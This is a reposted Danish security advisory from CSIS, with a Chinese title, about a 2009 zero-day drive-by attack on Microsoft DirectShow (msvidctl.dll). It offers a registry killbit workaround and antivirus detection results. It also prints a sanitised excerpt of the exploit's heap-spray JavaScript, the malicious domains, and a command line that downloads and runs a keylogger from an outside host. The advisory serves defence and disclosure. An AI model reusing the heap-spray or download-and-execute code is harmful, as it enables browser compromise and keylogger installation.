微软又爆0 Day!
From:csis
CSIS har opfanget flere systematiske drive-by angreb der udnytter en ikke patchet sårbarhed i Microsoft DirectShow (msvidctl.dll). I tusindvis af websider er i weekenden blevet kompromitteret og skadeligt script er blevet indsat.
Angreb udføres via kompromitterede websider og et indlejret javascript der flytter en besøger fra websiden over mod flere fjendtlige drive-by servere. CSIS har blacklistet flere domæner i CSIS Sec-DNS for at beskytte mod dette og tilsvarende angreb.
Det skadelige script, som indsættes på kompromitterede websider, tvinger brugeren til at besøge domænet: (mellemrum indlagt af CSIS)
8oy4t.8 866.org. Fra denne webside hentes "/aa/go.jpg" der udnytter multiple sårbarheder, herunder et hidtil ukendt stack overflow i DirectShow MPEG2TuneRequest.
Sårbarheden befinder sig i flere versioner af Microsoft Windows bl.a. Windows 2000, 2003 og XP.
Man kan omgå problemet ved at sætte en killbit ved den fejlbehæftede CLSID:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
Ovenstående løsning dræber den pågældende CLSID. Man kan indsætte området markeret med kursiv i notepad og gemme filen som .reg. Kør den fra skrivebordet og lad den modificere registreringsdatabasen. Bemærk at dette er et workaround og ikke en permant løsning på problemet.
Websiden forsøger at køre følgende shellkode (et udtræk herunder, saniteret af CSIS)
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
" + [SNIP]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Koden spawner en shell med følgende kald, hvorfra der hentes og køres skadelig kode: (mellemrum indlagt af CSIS)
C:\[%program files%]\Internet Explorer\iexplore.exe" http://mill/ lk.com/wm/svchost.exe
Målet med dette angreb er at køre filen "svchost.exe" på sårbare systemer. Filen er en keylogger, der registrerer samtlige tastetryk på maskinen og derudover binder maskinen ind i et C&C/BOT netværk. Koden henter flere ledsager komponenter der installerer en cocktail af skadelig kode på det kompromitterede system.
Bemærk at vi har set flere injektion angreb der udnytter denne sårbarhed. Der anvendes flere forskellige landingszoner, så vi anbefaler at man beskytter sig med CSIS Sec-DNS.
Exploitkoden, der køres fra drive-by siden, opnår følgende antivirus detektion:
Antivirus Version Last Update Result
a-squared 4.5.0.18 2009.07.05 -
AhnLab-V3 5.0.0.2 2009.07.05 -
AntiVir 7.9.0.204 2009.07.03 HTML/Shellcode.Gen
Antiy-AVL 2.0.3.1 2009.07.03 -
Authentium 5.1.2.4 2009.07.04 -
Avast 4.8.1335.0 2009.07.04 -
AVG 8.5.0.386 2009.07.05 -
BitDefender 7.2 2009.07.05 -
CAT-QuickHeal 10.00 2009.07.03 -
ClamAV 0.94.1 2009.07.03 -
Comodo 1538 2009.07.02 -
DrWeb 5.0.0.12182 2009.07.05 -
eSafe 7.0.17.0 2009.07.02 -
eTrust-Vet 31.6.6596 2009.07.03 -
F-Prot 4.4.4.56 2009.07.04 -
F-Secure 8.0.14470.0 2009.07.05 -
Fortinet 3.117.0.0 2009.07.03 -
GData 19 2009.07.05 -
Ikarus T3.1.1.64.0 2009.07.05 -
Jiangmin 11.0.706 2009.07.05 -
K7AntiVirus 7.10.783 2009.07.03 -
Kaspersky 7.0.0.125 2009.07.05 -
McAfee 5666 2009.07.04 -
McAfee+Artemis 5666 2009.07.04 -
McAfee-GW-Edition 6.8.5 2009.07.05 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.4803 2009.07.05 Exploit:JS/ShellCode.gen
NOD32 4217 2009.07.04 -
Norman 6.01.09 2009.07.04 -
nProtect 2009.1.8.0 2009.07.05 -
Panda 10.0.0.14 2009.07.04 -
PCTools 4.4.2.0 2009.07.03 -
Prevx 3.0 2009.07.05 -
Rising 21.36.62.00 2009.07.05 -
Sophos 4.43.0 2009.07.05 -
Sunbelt 3.2.1858.2 2009.07.05 -
Symantec 1.4.4.12 2009.07.05 -
TheHacker 6.3.4.3.362 2009.07.04 -
TrendMicro 8.950.0.1094 2009.07.04 -
VBA32 3.12.10.7 2009.07.05 -
ViRobot 2009.7.3.1818 2009.07.03 -
VirusBuster 4.6.5.0 2009.07.04 JS.BOFExploit.Gen
--Eof--